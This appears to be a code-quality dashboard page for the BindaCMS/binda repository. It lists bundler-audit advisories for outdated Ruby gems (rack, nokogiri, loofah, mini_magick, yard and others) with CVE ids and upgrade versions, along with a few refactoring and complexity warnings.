Sign upLogin

BindaCMS/binda

View on GitHub
Star

Showing 81 of 81 total issues

Directory traversal in Rack::Directory app bundled with Rack
Open

    rack (2.0.7)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2020-8161

Criticality: High

URL: https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA

Solution: upgrade to ~> 2.1.3, >= 2.2.0

Update bundled libxml2 to v2.10.3 to resolve multiple CVEs
Open

    nokogiri (1.10.5)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory:

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-2qc6-mcvw-92cw

Solution: upgrade to >= 1.13.9

Update packaged libxml2 (2.9.12 → 2.9.13) and libxslt (1.1.34 → 1.1.35)
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2021-30560

Criticality: High

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2

Solution: upgrade to >= 1.13.2

Improper Handling of Unexpected Data Type in Nokogiri
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-29181

Criticality: High

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xh29-r2w5-wx8m

Solution: upgrade to >= 1.13.6

Improper neutralization of data URIs may allow XSS in rails-html-sanitizer
Open

    rails-html-sanitizer (1.3.0)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-23518

Criticality: Medium

URL: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-mcvf-2q2m-x72m

Solution: upgrade to >= 1.4.4

Server-side request forgery in CarrierWave
Open

    carrierwave (1.2.3)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2021-21288

Criticality: Medium

URL: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-fwcm-636p-68r5

Solution: upgrade to ~> 1.3.2, >= 2.1.1

Regular Expression Denial of Service in Addressable templates
Open

    addressable (2.4.0)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2021-32740

Criticality: High

URL: https://github.com/advisories/GHSA-jxhc-q857-3j6g

Solution: upgrade to >= 2.8.0

Uncontrolled Recursion in Loofah
Open

    loofah (2.3.1)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-23516

Criticality: High

URL: https://github.com/flavorjones/loofah/security/advisories/GHSA-3x8r-x6xp-q4vm

Solution: upgrade to >= 2.19.1

Denial of Service in rubyzip ("zip bombs")
Open

    rubyzip (1.2.3)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2019-16892

Criticality: Medium

URL: https://github.com/rubyzip/rubyzip/pull/403

Solution: upgrade to >= 1.3.0

Improper neutralization of data URIs may allow XSS in Loofah
Open

    loofah (2.3.1)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-23515

Criticality: Medium

URL: https://github.com/flavorjones/loofah/security/advisories/GHSA-228g-948r-83gx

Solution: upgrade to >= 2.19.1

Remote command execution via filename
Open

    mini_magick (4.8.0)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2019-13574

Criticality: High

URL: https://benjamin-bouchet.com/blog/vulnerabilite-dans-la-gem-mini_magick-version-4-9-4/

Solution: upgrade to >= 4.9.4

Out-of-bounds Write in zlib affects Nokogiri
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2018-25032

Criticality: High

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5

Solution: upgrade to >= 1.13.4

Denial of Service (DoS) in Nokogiri on JRuby
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-24839

Criticality: High

URL: https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv

Solution: upgrade to >= 1.13.4

json Gem for Ruby Unsafe Object Creation Vulnerability (additional fix)
Open

    json (2.2.0)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2020-10663

Criticality: High

URL: https://www.ruby-lang.org/en/news/2020/03/19/json-dos-cve-2020-10663/

Solution: upgrade to >= 2.3.0

Function LoginForm has 75 lines of code (exceeds 25 allowed). Consider refactoring.
Open

var LoginForm = function () {
    function LoginForm() {
        _classCallCheck(this, LoginForm);

        this.current = 0;
Severity: Major
Found in app/assets/javascripts/binda/dist/binda.bundle.js - About 3 hrs to fix

    Function Shader has 71 lines of code (exceeds 25 allowed). Consider refactoring.
    Open

    var Shader = function () {
  function Shader() {
    _classCallCheck(this, Shader);

    this.uniforms = {
    Severity: Major
    Found in app/assets/javascripts/binda/dist/binda.bundle.js - About 2 hrs to fix

      Cyclomatic complexity for cli_arg_version is too high. [9/6]
      Open

        def cli_arg_version
    return unless invoked_as_script? # don't want to hijack other binstubs
    return unless "update".start_with?(ARGV.first || " ") # must be running `bundle update`
    bundler_version = nil
    update_index = nil
      Severity: Minor
      Found in exe/bundle by rubocop

      This cop checks that the cyclomatic complexity of methods is not higher than the configured maximum. The cyclomatic complexity is the number of linearly independent paths through a method. The algorithm counts decision points and adds one.

      An if statement (or unless or ?:) increases the complexity by one. An else branch does not, since it doesn't add a decision point. The && operator (or keyword and) can be converted to a nested if statement, and ||/or is shorthand for a sequence of ifs, so they also add one. Loops can be said to have an exit condition, so they add one.

      Possible shell escape sequence injection vulnerability in Rack
      Open

          rack (2.0.7)
      Severity: Minor
      Found in Gemfile.lock by bundler-audit

      Advisory: CVE-2022-30123

      Criticality: Critical

      URL: https://groups.google.com/g/ruby-security-ann/c/LWB10kWzag8

      Solution: upgrade to >= 2.0.9.1, ~> 2.0.9, >= 2.1.4.1, ~> 2.1.4, >= 2.2.3.1

      Arbitrary path traversal and file access via yard server
      Open

          yard (0.9.19)
      Severity: Critical
      Found in Gemfile.lock by bundler-audit

      Advisory: CVE-2019-1020001

      Criticality: High

      URL: https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr

      Solution: upgrade to >= 0.9.20

      Possible arbitrary path traversal and file access via yard server
      Open

          yard (0.9.19)
      Severity: Minor
      Found in Gemfile.lock by bundler-audit

      Advisory:

      URL: https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr

      Solution: upgrade to >= 0.9.20

      Severity
      Category
      Status
      Source
      Language